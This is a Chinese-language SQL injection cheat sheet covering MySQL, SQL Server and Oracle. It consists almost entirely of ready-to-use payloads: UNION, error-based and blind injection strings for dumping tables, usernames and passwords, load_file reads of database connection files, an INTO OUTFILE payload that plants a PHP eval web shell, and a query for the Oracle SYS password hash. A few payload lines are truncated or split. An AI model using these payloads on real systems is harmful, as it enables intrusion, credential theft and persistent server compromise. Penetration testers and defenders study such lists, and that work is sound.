SQL注入速查筆記
作者:Bypass
Mysql劃分:權限 root 普通用戶 版本 mysql>5.0 mysql<5.0。
0x01 Mysql
Mysql劃分:權限 root 普通用戶 版本 mysql>5.0 mysql<5.0
1.1 root權限
load_file和into outfile用戶必須有FILE權限,并且還需要知道網站的絕對路徑
判斷是否具有讀寫權限
- and (select count(*) from mysql.user)>0#
- and (select count(file_priv) from mysql.user)>#
A、Load_file() 該函數用來讀取源文件的函數,只能讀取絕對路徑的網頁文件
注意:路徑符號”\”錯誤 “\”正確 “/”正確,轉換成十六進制,不用“”
- id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,load_file(’/var/www/index.php’)(物理路徑轉16進制)
可以用來讀取數據庫連接文件獲取數據連接賬號、密碼等
- ?id=1'and 1=2 union select 1,load_file('D:\\wamp\\www\\111.php')%23
- id=1'and 1=2 union select 1,load_file(0x443A2F77616D702F7777772F312E706870)%23
B、into outfile函數
條件:1. 絕對路徑 2.可以使用單引號
- ?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'E:/study/WWW/evil.php'
- ?id=1 LIMIT 0,1 INTO OUTFILE 'E:/s
- tudy/WWW/evil.php' lines terminated by 0x20273c3f70687020406576616c28245f504f53545b2767275d293b3f3e27 --
1.2 MySQL聯合查詢
1.2.1 適用于mysql低于5.0版本
- 1.判斷是否可以注入
- ?id=1 and 1=1,頁面正常
- ?id=1 and 1=2,頁面空白
- 2.獲得字段數
- order by的方法來判斷,比如:
- ?id=1 order by 4 頁面顯示正常
- ?id=1 order by 5 頁面出錯,說明字段數等于4
- 3.獲得顯示位
- ?id=1 and 1=2 union select 1,2,3,4
- //比如,頁面上出現了幾個數字,分別是2,3,4,那么,這幾個數字就被我們稱作顯示位。
- 4.猜表名
- 猜表名的方法是,在第三步的完整的地址后加上:Form 表名,比如:
- ?id=1 and 1=2 union select 1,2,3,4 from users
- 這樣,當users表存在的話,頁面就會顯示正常,如果我們提交一個不存在的表名,頁面就會出錯。
- 5.猜字段
- 使用:Concat(字段名)替換顯示位的位置。
- ?id=1 and 1=2 union select 1,2,3,concat(username,password) from users
1.2.2 適用于Mysql 5.0以上版本支持查表查列
- 1.先判斷是否可以注入
- and+1=1,頁面正常
- and+1=2,頁面空白
- 2.獲得字段數:使用order by
- 提交:
- ?id=1 order by 4 正確。
- ?id=1 order by 5 錯誤。
- 那么,判斷出字段數為4。
- 3.獲得顯示位
- 提交:?id=1 +and+1=2+union+select+1,2,3,4
- 顯示位為:2,3,4
- 4.獲取信息
- ?id=1 +and+1=2+union+select+1,2,3,version()
- database()
- user()
- version()
- database()
- @@basedir 數據庫安裝路徑
- @@datadir 數據庫路徑
- 5.查表
- ?id=1 and 1=2 union select 1,2,3,table_name from information_schema.tables where table_schema=0x74657374(數據庫名test的Hex) limit 0,1--
- 得到表:test
- 6.查字段
- ?id=1 and 1=2 union select 1,2,3,column_name from
- information_schema.columns where table_name=0x74657374 limit 0,1--
- 得到字段:id,username,password
- 7.爆字段內容
- ?id=1+and+1=2+union+select+1,2,3,concat(username,password) from+test
1.3 MySQL報錯注入
mysql暴錯注入方法整理,通過floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。
多種報錯注入方式:
- and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
- and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
- and extractvalue(1, concat(0x5c, (select VERSION() from information_schema.tables limit 1)))
- and 1=(updatexml(1,concat(0x3a,(select user())),1))
- and GeometryCollection((select*from(select*from(select @@version)f)x))
- and polygon((select*from(select name_const(version(),1))x))
- and linestring((select * from(select * from(select user())a)b))
- and multilinestring((select * from(select * from(select version())a)b));
- and multipoint((select * from(select * from(select user())a)b));
- and multipolygon((select * from(select * from(select user())a)b));
- and exp(~(select * from(select version())a));
1.4 MySQL盲注
基于布爾型注入
- id=1 and (select length(user()))=20 # 返回正常頁面 長度20位
- id=1 and ascii(substring((SELECT username FROM users limit 0,1),1,1))=97
- //截取username第一個數據的ascii值
基于時間型注入
- 1 xor (if(ascii(mid(user()from(1)for(1)))='r',sleep(5),0))
- 1 xor if(ascii(substr(user(),1,1)) like 1124,benchmark(1000000, md5('1')),'2')
0x02 SQLServer
SA權限:數據庫操作,文件管理,命令執行,注冊表讀取等
Db權限:文件管理,數據庫操作等
Public權限:數據庫操作
2.1 SQLServer 聯合查詢
- 1.判斷是否存在注入
- ?id=1 and 1=1-- 返回正確
- ?id=1 and 1=2-- 返回錯誤
- 2.獲取字段數
- ?id=1 order by 2-- 返回正確頁面
- ?id=1 order by 3-- 返回錯誤頁面 字段長度為2
- 3.查看數據庫版本
- ?id=1 and 1=2 union select db_name(),null //獲得當前數據庫
- 4.查看表名
- ?id=1 and 1=2 union select top 1 TABLE_NAME ,2 from INFORMATION_SCHEMA.TABLES where table_name not in ('users')
- 5.查看列名
- ?id=1 and 1=2 union select top 1 column_name ,2 from information_schema.columns where table_name ='users' and column_name not in ('uname')
- 6.獲取數據
- ?id=1 and 1=2 union select top 1 uname,null from users
2.2 SQLServer 報錯注入
- 1.獲取表名
- ?id=4' and 1>(select top 1 TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in ('admin') )--
- 2.獲取列名
- ?id=4' and 1>(select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='admin' and column_name not in ('id')) --
- 3.獲取數據
- ?id=4' and 1=(select top 1 pwd from admin) --
- 4.獲取數據庫信息
- ?id=1' and 1=(select @@version)-- //SQL Server 2000
- ?id=1' and 1=(select db_name()) //當前使用的數據庫
2.3 SQLServer 盲注
- 1、猜表名
- ?id=1 and (select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and len(name)=7)=1 -- //獲取第一個表的長度7
- ?id=1 and (select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,1,1))=116)=1 -- //截取第一個表第一位的ascii碼
- ?id=1 and (select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,1,1))>115)=1 --//猜第二個表的第一位ASCII值
- 得到表名,進一步猜解字段
- 2、猜字段
- id=1 and
- (select count(*) from syscolumns where name in (select top 1 name from syscolumns where id=(select id from sysobjects where name='users')) and ascii(substring(name,1,1))=117)=1
- //獲取users表第一個字段的ASCII值
- id=1 and
- (select count(*) from syscolumns where name in (select top 1 name from syscolumns where id=(select id from sysobjects where name='users') ) and name not in ('upass') and ascii(substring(name,1,1))>90)=1 --
- //獲取user表第二個字段的第一位ASCII值
- 3、猜數據
- id=1 and (ascii(substring((select top 1 uname from users),1,1)))=33 --
- //獲取users表中uname字段的第一位ASCII值
0x03 Oracle
3.1 聯合查詢
- Union select null,null,null 從第一個null開始加’null’,得到顯示位
- Union select null,null,null from dual 返回正確,存在dual表
- Union Select tablespace_name from user_tablespaces //查庫
- Union Select table_name from user_tables where rownum = 1 and table_name<>’news’ //查表
- Union Select column_name from user_tab_columns where table_name=’users’ //查列
- ?id=1 order by 1-- //獲取字段數
- and+1=1+union+all+select+(SELECT banner FROM v$version where rownum=1)+from+dual--//獲取數據庫版本
- and+1=1+union+all+select+(select user from dual where rownum=1)+from+dual-- //獲取當前連接數據庫的用戶名
- union+all+select+(select password from sys.user$ where rownum=1 and name='SYS')+from+dual-- -- //獲取用戶SYS密文密碼
- union+all+select+(SELECT name FROM v$database)+from+dual-- //獲取庫名
- and+1=1+union+all+select+(select table_name from user_tables where rownum=1)+from+dual--//獲取第一個表名
3.2 手工顯錯注入
- 最大的區別就是utl_inaddr.get_host_address這個函數,10g可以調用,11g需要dba高權限
- //判斷是否是oracle
- ?id=1 and exists(select * from dual)--
- //獲取庫名
- ?id=1 and 1=utl_inaddr.get_host_address((SELECT name FROM v$database))—-
- //獲取數據庫服務器所在ip
- ?id=1 and 1=ctxsys.drithsx.sn(1,(select UTL_INADDR.get_host_address from dual where rownum=1))--
- ?id=1 and 1= CTXSYS.CTX_QUERY.CHK_XPATH((select banner from v$version where rownum=1),'a','b')--
- ?id=1 or 1=ORDSYS.ORD_DICOM.GETMAPPINGXPATH((select banner from v$version where rownum=1),'a','b')--
- ?id=1 and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null --
- ?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual))--
3.3 盲注
基于布爾類型的盲注:
- ?id=7782' and length((SELECT name FROM v$database))=4-- 獲取數據庫名長度
- ?id=7782' and ascii(substr((SELECT name FROM v$database),1,1))=79--
- 獲取數據庫名第一位為O
基于時間延遲的盲注:
- ?id=7782' and 1=(CASE WHEN (ascii(substr((SELECT name FROM v$database),1,1))=79) THEN 1 ELSE 2 END)--
- ?id=7782' AND 1=(CASE WHEN (ascii(substr((SELECT name FROM v$database),1,1))=79) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(103)||CHR(102)||CHR(102),5) ELSE 1 END)--
責任編輯:武曉燕
來源:
Bypass
